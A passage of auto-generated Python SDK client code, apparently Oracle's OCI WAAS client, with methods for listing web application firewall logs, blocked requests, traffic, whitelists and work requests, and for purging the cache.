:param list[str] waf_feature: (optional)
Filter stats by the Web Application Firewall feature that triggered the block action. If unspecified, data for all WAF features will be returned.
Allowed values are: "PROTECTION_RULES", "JS_CHALLENGE", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "CAPTCHA", "ADDRESS_RATE_LIMITING"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafBlockedRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_blocked_requests.py.html>`__ to see an example of how to use list_waf_blocked_requests API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/blocked"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"time_observed_greater_than_or_equal_to",
"time_observed_less_than",
"limit",
"page",
"waf_feature"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waf_blocked_requests got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'waf_feature' in kwargs:
waf_feature_allowed_values = ["PROTECTION_RULES", "JS_CHALLENGE", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "CAPTCHA", "ADDRESS_RATE_LIMITING"]
for waf_feature_item in kwargs['waf_feature']:
if waf_feature_item not in waf_feature_allowed_values:
raise ValueError(
"Invalid value for `waf_feature`, must be one of {0}".format(waf_feature_allowed_values)
)
query_params = {
"timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
"timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"wafFeature": self.base_client.generate_collection_format_param(kwargs.get("waf_feature", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafBlockedRequest]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafBlockedRequest]")
def list_waf_logs(self, waas_policy_id, **kwargs):
"""
Gets structured Web Application Firewall event logs for a WAAS
policy. Sorted by the `timeObserved` in ascending order (starting from the
oldest recorded event).
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `20`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param datetime time_observed_greater_than_or_equal_to: (optional)
A filter that matches log entries where the observed event occurred on or after a date and time specified in RFC 3339 format. If unspecified, defaults to two hours before receipt of the request.
:param datetime time_observed_less_than: (optional)
A filter that matches log entries where the observed event occurred before a date and time, specified in RFC 3339 format.
:param str text_contains: (optional)
A full text search for logs.
:param list[str] access_rule_key: (optional)
Filters logs by access rule key.
:param list[str] action: (optional)
Filters logs by Web Application Firewall action.
Allowed values are: "BLOCK", "DETECT", "BYPASS", "LOG", "REDIRECTED"
:param list[str] client_address: (optional)
Filters logs by client IP address.
:param list[str] country_code: (optional)
Filters logs by country code. Country codes are in ISO 3166-1 alpha-2 format. For a list of codes, see `ISO's website`__.
__ https://www.iso.org/obp/ui/#search/code/
:param list[str] country_name: (optional)
Filter logs by country name.
:param list[str] fingerprint: (optional)
Filter logs by device fingerprint.
:param list[str] http_method: (optional)
Filter logs by HTTP method.
Allowed values are: "OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"
:param list[str] incident_key: (optional)
Filter logs by incident key.
:param list[str] log_type: (optional)
Filter by log type. For more information about WAF logs, see `Logs`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/logs.htm
Allowed values are: "ACCESS", "PROTECTION_RULES", "JS_CHALLENGE", "CAPTCHA", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "ADDRESS_RATE_LIMITING"
:param list[str] origin_address: (optional)
Filter by origin IP address.
:param list[str] referrer: (optional)
Filter by referrer.
:param list[str] request_url: (optional)
Filter by request URL.
:param list[int] response_code: (optional)
Filter by response code.
:param list[str] threat_feed_key: (optional)
Filter by threat feed key.
:param list[str] user_agent: (optional)
Filter by user agent.
:param list[str] protection_rule_key: (optional)
Filter by protection rule key.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafLog`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_logs.py.html>`__ to see an example of how to use list_waf_logs API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafLogs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"time_observed_greater_than_or_equal_to",
"time_observed_less_than",
"text_contains",
"access_rule_key",
"action",
"client_address",
"country_code",
"country_name",
"fingerprint",
"http_method",
"incident_key",
"log_type",
"origin_address",
"referrer",
"request_url",
"response_code",
"threat_feed_key",
"user_agent",
"protection_rule_key"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waf_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'action' in kwargs:
action_allowed_values = ["BLOCK", "DETECT", "BYPASS", "LOG", "REDIRECTED"]
for action_item in kwargs['action']:
if action_item not in action_allowed_values:
raise ValueError(
"Invalid value for `action`, must be one of {0}".format(action_allowed_values)
)
if 'http_method' in kwargs:
http_method_allowed_values = ["OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"]
for http_method_item in kwargs['http_method']:
if http_method_item not in http_method_allowed_values:
raise ValueError(
"Invalid value for `http_method`, must be one of {0}".format(http_method_allowed_values)
)
if 'log_type' in kwargs:
log_type_allowed_values = ["ACCESS", "PROTECTION_RULES", "JS_CHALLENGE", "CAPTCHA", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "ADDRESS_RATE_LIMITING"]
for log_type_item in kwargs['log_type']:
if log_type_item not in log_type_allowed_values:
raise ValueError(
"Invalid value for `log_type`, must be one of {0}".format(log_type_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
"timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
"textContains": kwargs.get("text_contains", missing),
"accessRuleKey": self.base_client.generate_collection_format_param(kwargs.get("access_rule_key", missing), 'multi'),
"action": self.base_client.generate_collection_format_param(kwargs.get("action", missing), 'multi'),
"clientAddress": self.base_client.generate_collection_format_param(kwargs.get("client_address", missing), 'multi'),
"countryCode": self.base_client.generate_collection_format_param(kwargs.get("country_code", missing), 'multi'),
"countryName": self.base_client.generate_collection_format_param(kwargs.get("country_name", missing), 'multi'),
"fingerprint": self.base_client.generate_collection_format_param(kwargs.get("fingerprint", missing), 'multi'),
"httpMethod": self.base_client.generate_collection_format_param(kwargs.get("http_method", missing), 'multi'),
"incidentKey": self.base_client.generate_collection_format_param(kwargs.get("incident_key", missing), 'multi'),
"logType": self.base_client.generate_collection_format_param(kwargs.get("log_type", missing), 'multi'),
"originAddress": self.base_client.generate_collection_format_param(kwargs.get("origin_address", missing), 'multi'),
"referrer": self.base_client.generate_collection_format_param(kwargs.get("referrer", missing), 'multi'),
"requestUrl": self.base_client.generate_collection_format_param(kwargs.get("request_url", missing), 'multi'),
"responseCode": self.base_client.generate_collection_format_param(kwargs.get("response_code", missing), 'multi'),
"threatFeedKey": self.base_client.generate_collection_format_param(kwargs.get("threat_feed_key", missing), 'multi'),
"userAgent": self.base_client.generate_collection_format_param(kwargs.get("user_agent", missing), 'multi'),
"protectionRuleKey": self.base_client.generate_collection_format_param(kwargs.get("protection_rule_key", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafLog]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafLog]")
def list_waf_requests(self, waas_policy_id, **kwargs):
"""
Gets the number of requests managed by a Web Application Firewall
over a specified period of time, including blocked requests. Sorted
by `timeObserved` in ascending order (starting from oldest requests).
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param datetime time_observed_greater_than_or_equal_to: (optional)
A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.
:param datetime time_observed_less_than: (optional)
A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafRequest`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_requests.py.html>`__ to see an example of how to use list_waf_requests API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/requests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"time_observed_greater_than_or_equal_to",
"time_observed_less_than",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waf_requests got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
"timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafRequest]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafRequest]")
def list_waf_traffic(self, waas_policy_id, **kwargs):
"""
Gets the Web Application Firewall traffic data for a WAAS policy.
Sorted by `timeObserved` in ascending order (starting from oldest data).
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param datetime time_observed_greater_than_or_equal_to: (optional)
A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.
:param datetime time_observed_less_than: (optional)
A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafTrafficDatum`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waf_traffic.py.html>`__ to see an example of how to use list_waf_traffic API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/traffic"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"time_observed_greater_than_or_equal_to",
"time_observed_less_than",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waf_traffic got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
"timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafTrafficDatum]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WafTrafficDatum]")
def list_whitelists(self, waas_policy_id, **kwargs):
"""
Gets the list of whitelists defined in the Web Application Firewall configuration for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Whitelist`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_whitelists.py.html>`__ to see an example of how to use list_whitelists API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/whitelists"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_whitelists got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Whitelist]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Whitelist]")
def list_work_requests(self, waas_policy_id, compartment_id, **kwargs):
"""
Gets a list of subnets (CIDR notation) from which the WAAS EDGE may make requests. The subnets are owned by OCI and forward traffic to your origins. Allow traffic from these subnets to your origins. They are not associated with specific regions or compartments.
:param str waas_policy_id: (required)
The `OCID`__ of the policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str compartment_id: (required)
The `OCID`__ of the compartment. This number is generated when the compartment is created.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which work requests are sorted in a paginated 'List' call. If unspecified, defaults to `timeAccepted`.
Allowed values are: "id", "status", "timeAccepted", "timeStarted", "timeFinished", "operationType"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WorkRequestSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
"""
resource_path = "/workRequests"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["id", "status", "timeAccepted", "timeStarted", "timeFinished", "operationType"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"waasPolicyId": waas_policy_id,
"compartmentId": compartment_id,
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WorkRequestSummary]")
def purge_cache(self, waas_policy_id, **kwargs):
"""
Performs a purge of the cache for each specified resource. If no resources are passed, the cache for the entire Web Application Firewall will be purged.
For more information, see `Caching Rules`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/cachingrules.htm#purge
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param oci.waas.models.PurgeCache purge_cache: (optional)
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/purge_cache.py.html>`__ to see an example of how to use purge_cache API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/actions/purgeCache"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match",
"purge_cache"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"purge_cache got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('purge_cache'))
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('purge_cache'))
def update_access_rules(self, waas_policy_id, access_rules, **kwargs):
"""
